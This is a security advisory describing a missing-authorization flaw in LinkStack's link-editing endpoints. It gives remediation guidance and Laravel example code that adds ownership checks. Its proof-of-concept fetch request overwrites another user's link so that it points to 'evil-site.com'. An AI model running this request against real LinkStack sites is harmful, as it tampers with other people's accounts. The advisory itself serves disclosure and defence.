# Vulnerability Summary

## Overview

LinkStack's link management endpoints (`/studio/edit-link`, `/studio/sort-link`, `/clearIcon`) accept user-supplied link IDs but do not verify that the currently logged-in user owns the referenced link. Any authenticated user can therefore modify or delete other users' links (an insecure direct object reference / missing authorization check).

## Impact Scope

- **Affected Endpoints**:
  - `POST /studio/edit-link`
  - `POST /studio/sort-link`
  - `GET /clearIcon/{id}`
- **Consequences**:
  - Unauthorized modification of other users' links (e.g., title, type, button text, etc.).
  - Unauthorized deletion of other users' link icons.
  - Potential data tampering or denial of service.

## Remediation

1. **`/studio/edit-link`**: Implement an ownership check; return a 403 status if the link does not belong to the current user.
2. **`/studio/sort-link`**: Add a `user_id` condition to the `WHERE` clause so that only the current user's links are updated.
3. **`/clearIcon/{id}`**: Add middleware that verifies link ownership before the deletion is executed.

## POC Code

```javascript
// USER_B_LINK_ID is a placeholder for another user's link ID (see the note below).
fetch('/studio/edit-link', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded',
    'X-CSRF-TOKEN': document.querySelector('meta[name="csrf-token"]').content
  },
  body: new URLSearchParams({
    linkid: String(USER_B_LINK_ID),
    link: 'https://evil-site.com',
    title: 'Modified',
    typeenum: 'link',
    button: 'custom_website'
  })
}).then(r => console.log('Status:', r.status))
```

> Note: `USER_B_LINK_ID` refers to another user's link ID. Before the fix, the request succeeds (returns 200); after the fix, it returns 403 Forbidden.
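The three remediation steps above, written out as an added Laravel-style illustration. This is not LinkStack's own code: it assumes an Eloquent model `App\Models\Link` with `id`, `user_id`, `link`, `title` and `order` columns, an authenticated `$request->user()`, and controller method and middleware names (`editLink`, `sortLink`, `EnsureLinkOwner`) that are placeholders chosen for this example. The common thread is that a link ID from the request is never trusted on its own; it is always paired with the authenticated user's ID, either by an explicit compare (403 on mismatch), by scoping the `UPDATE` with a `user_id` condition, or by a middleware that rejects the request before the handler runs.

```php
<?php
// Added example, not LinkStack's code. Assumed: Laravel app, App\Models\Link model
// with id/user_id/link/title/order columns, authenticated users via $request->user().

use App\Models\Link;
use Closure;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Route;

class LinkOwnershipExampleController
{
    // 1. /studio/edit-link: load the link by ID, then refuse with 403 unless the
    //    authenticated user is its owner. Loading by ID alone and updating is the
    //    vulnerable pattern; the abort_if line is the missing ownership check.
    public function editLink(Request $request)
    {
        $data = $request->validate([
            'linkid' => 'required|integer',
            'link'   => 'required|url',
            'title'  => 'required|string|max:255',
        ]);

        $link = Link::findOrFail($data['linkid']);

        // Ownership check: compare the owner column with the current user.
        abort_if((int) $link->user_id !== (int) $request->user()->id, 403);

        $link->update(['link' => $data['link'], 'title' => $data['title']]);

        return response()->json(['status' => 'ok']);
    }

    // 2. /studio/sort-link: scope the UPDATE to the current user's rows. A foreign
    //    link ID then matches zero rows instead of being silently reordered.
    public function sortLink(Request $request)
    {
        $data = $request->validate([
            'linkid' => 'required|integer',
            'order'  => 'required|integer',
        ]);

        $affected = Link::where('id', $data['linkid'])
            ->where('user_id', $request->user()->id)   // the missing WHERE condition
            ->update(['order' => $data['order']]);

        // Zero affected rows: the link is not ours (or does not exist).
        abort_if($affected === 0, 403);

        return response()->json(['status' => 'ok']);
    }

    // 3. /clearIcon/{id}: the handler itself stays simple because the middleware
    //    below has already established that {id} belongs to the current user.
    public function clearIcon(Request $request, int $id)
    {
        Link::where('id', $id)->update(['icon' => null]); // assumed icon column
        return response()->json(['status' => 'ok']);
    }
}

// Middleware for step 3: runs before the controller and blocks the request unless
// the {id} route parameter names a link owned by the authenticated user.
class EnsureLinkOwner
{
    public function handle(Request $request, Closure $next)
    {
        $owned = Link::where('id', $request->route('id'))
            ->where('user_id', $request->user()->id)
            ->exists();

        abort_unless($owned, 403);

        return $next($request);
    }
}

// Route registration (would live in routes/web.php): the ownership middleware is
// attached after 'auth', so unauthenticated requests are rejected first.
Route::get('/clearIcon/{id}', [LinkOwnershipExampleController::class, 'clearIcon'])
    ->middleware(['auth', EnsureLinkOwner::class])
    ->whereNumber('id');
```

A quick check for a fix of this kind is to replay the proof-of-concept request with a link ID belonging to a second test account: the edit endpoint should now answer 403, the sort endpoint should report zero updated rows and answer 403, and the icon-clearing route should be stopped in the middleware before any database write occurs.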